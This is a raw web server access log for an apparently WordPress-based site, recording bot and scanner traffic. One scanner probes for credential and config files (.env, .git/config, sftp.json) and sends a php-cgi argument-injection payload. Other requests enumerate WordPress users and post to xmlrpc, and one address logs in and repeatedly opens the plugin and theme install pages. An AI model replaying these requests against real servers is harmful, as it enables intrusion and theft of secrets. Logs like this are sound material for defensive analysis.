47.236.2.142 - - [26/Jan/2026:09:07:37 -0500] "GET / HTTP/1.1" 301 - "-" "curl/7.78.0"
91.224.92.115 - - [26/Jan/2026:09:11:59 -0500] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 302 289 "-" "-"
193.142.147.209 - - [26/Jan/2026:09:16:58 -0500] "POST / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.212 - - [26/Jan/2026:09:20:38 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
49.51.72.76 - - [26/Jan/2026:09:20:45 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.46.118 - - [26/Jan/2026:09:22:27 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.174.93.12 - - [26/Jan/2026:09:24:04 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Moto G Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
71.6.146.185 - - [26/Jan/2026:09:30:27 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.146.185 - - [26/Jan/2026:09:30:30 -0500] "GET /robots.txt HTTP/1.1" 200 29 "-" "-"
71.6.146.185 - - [26/Jan/2026:09:30:32 -0500] "GET /.well-known/security.txt HTTP/1.1" 302 289 "-" "-"
80.82.70.133 - - [26/Jan/2026:09:30:58 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15"
80.82.77.202 - - [26/Jan/2026:09:31:40 -0500] "GET /aaa9 HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
80.82.77.202 - - [26/Jan/2026:09:31:40 -0500] "GET /aab9 HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
43.155.27.244 - - [26/Jan/2026:09:34:39 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:09:47:05 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
1.10.220.15 - - [26/Jan/2026:09:47:22 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
43.157.180.116 - - [26/Jan/2026:09:49:49 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
87.236.176.171 - - [26/Jan/2026:10:02:15 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
204.76.203.212 - - [26/Jan/2026:10:10:22 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
165.227.39.235 - - [26/Jan/2026:10:27:51 -0500] "GET / HTTP/1.1" 301 - "-" "-"
165.227.39.235 - - [26/Jan/2026:10:28:03 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:04 -0500] "POST /graphql HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:04 -0500] "POST /api HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:04 -0500] "POST /api/graphql HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:04 -0500] "POST /graphql/api HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:05 -0500] "POST /api/gql HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:06 -0500] "GET /swagger-ui.html HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:07 -0500] "GET /swagger/index.html HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:08 -0500] "GET /swagger/swagger-ui.html HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:09 -0500] "GET /webjars/swagger-ui/index.html HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:10 -0500] "GET /swagger.json HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:11 -0500] "GET /swagger/v1/swagger.json HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:12 -0500] "GET /v2/api-docs HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:13 -0500] "GET /v3/api-docs HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:14 -0500] "GET /api-docs/swagger.json HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:15 -0500] "GET /api/swagger.json HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:16 -0500] "GET /@vite/env HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:17 -0500] "GET /actuator/env HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:18 -0500] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D\"\"+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:19 -0500] "GET /server HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:20 -0500] "GET /.vscode/sftp.json HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:22 -0500] "GET /about HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:23 -0500] "GET /debug/default/view?panel=config HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:24 -0500] "GET /v2/_catalog HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:25 -0500] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:26 -0500] "GET /server-status HTTP/1.1" 200 58640 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:27 -0500] "GET /login.action HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:28 -0500] "GET /_all_dbs HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:29 -0500] "GET /.DS_Store HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:30 -0500] "GET /.env HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:32 -0500] "GET /.git/config HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:33 -0500] "GET /s/4373e2039313e2630323e24373/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:34 -0500] "GET /config.json HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:35 -0500] "GET /telescope/requests HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:36 -0500] "GET /info.php HTTP/1.1" 302 289 "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
165.227.39.235 - - [26/Jan/2026:10:28:37 -0500] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 - "-" "Mozilla/5.0 (l9scan/2.0.4373e2039313e2630323e24373; +https://leakix.net)"
162.142.125.219 - - [26/Jan/2026:10:32:11 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [26/Jan/2026:10:32:13 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
204.76.203.212 - - [26/Jan/2026:10:35:28 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
51.89.25.52 - - [26/Jan/2026:10:52:09 -0500] "GET /blog-verify HTTP/1.1" 302 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
43.167.232.38 - - [26/Jan/2026:10:58:28 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:11:01:27 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
114.119.128.132 - - [26/Jan/2026:11:06:30 -0500] "GET /index.php/tag/gay-dad HTTP/1.1" 200 16504 "http://www.lovelygays.com/index.php/horny-gays/gay-hardcore-tube.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.89.25.52 - - [26/Jan/2026:11:13:42 -0500] "GET /?check_plugin HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
51.89.25.52 - - [26/Jan/2026:11:13:42 -0500] "GET /?check_plugin HTTP/1.1" 200 56004 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
66.249.65.102 - - [26/Jan/2026:11:19:25 -0500] "GET /index.php/tag/friends HTTP/1.1" 200 16540 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.76.203.212 - - [26/Jan/2026:11:25:48 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.255.28.190 - - [26/Jan/2026:11:27:26 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
193.142.147.209 - - [26/Jan/2026:11:36:17 -0500] "POST / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
152.228.220.143 - - [26/Jan/2026:11:48:03 -0500] "GET /index.php/feed HTTP/1.1" 200 18064 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36"
185.59.245.213 - - [26/Jan/2026:11:50:43 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
204.76.203.212 - - [26/Jan/2026:11:52:49 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
14.241.96.71 - - [26/Jan/2026:12:05:55 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:05:57 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:05:59 -0500] "GET //?author=1 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:05:59 -0500] "GET //?author=2 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:05:59 -0500] "GET //?author=3 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:06:00 -0500] "GET //wp-json/wp/v2/users/ HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:06:00 -0500] "GET //wp-json/oembed/1.0/embed?url=http://www.lovelygays.com/ HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
14.241.96.71 - - [26/Jan/2026:12:06:00 -0500] "POST //xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:12:15:37 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
37.97.132.23 - - [26/Jan/2026:12:22:37 -0500] "GET / HTTP/1.1" 301 - "-" "Go-http-client/1.1"
193.202.83.188 - - [26/Jan/2026:12:22:55 -0500] "GET /wp-login.php HTTP/1.1" 200 2282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
193.202.83.188 - - [26/Jan/2026:12:22:56 -0500] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 2282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:22:56 -0500] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 302 - "http://www.lovelygays.com/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:22:57 -0500] "GET /wp-admin/ HTTP/1.1" 200 80852 "http://www.lovelygays.com/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:22:58 -0500] "GET /wp-admin/plugins.php HTTP/1.1" 200 49081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:22:59 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 48825 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:22:59 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 48825 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:00 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 48825 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:00 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 48825 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:01 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 48825 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:01 -0500] "GET /wp-admin/themes.php HTTP/1.1" 200 51189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:02 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:03 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:03 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:03 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:04 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:04 -0500] "GET /wp-admin/themes.php HTTP/1.1" 200 51189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:04 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:05 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:05 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:05 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:06 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:06 -0500] "GET /wp-admin/themes.php HTTP/1.1" 200 51189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:06 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:07 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:07 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:08 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:08 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:08 -0500] "GET /wp-admin/themes.php HTTP/1.1" 200 51189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:08 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:09 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:09 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:09 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:10 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:10 -0500] "GET /wp-admin/themes.php HTTP/1.1" 200 51189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:11 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:11 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
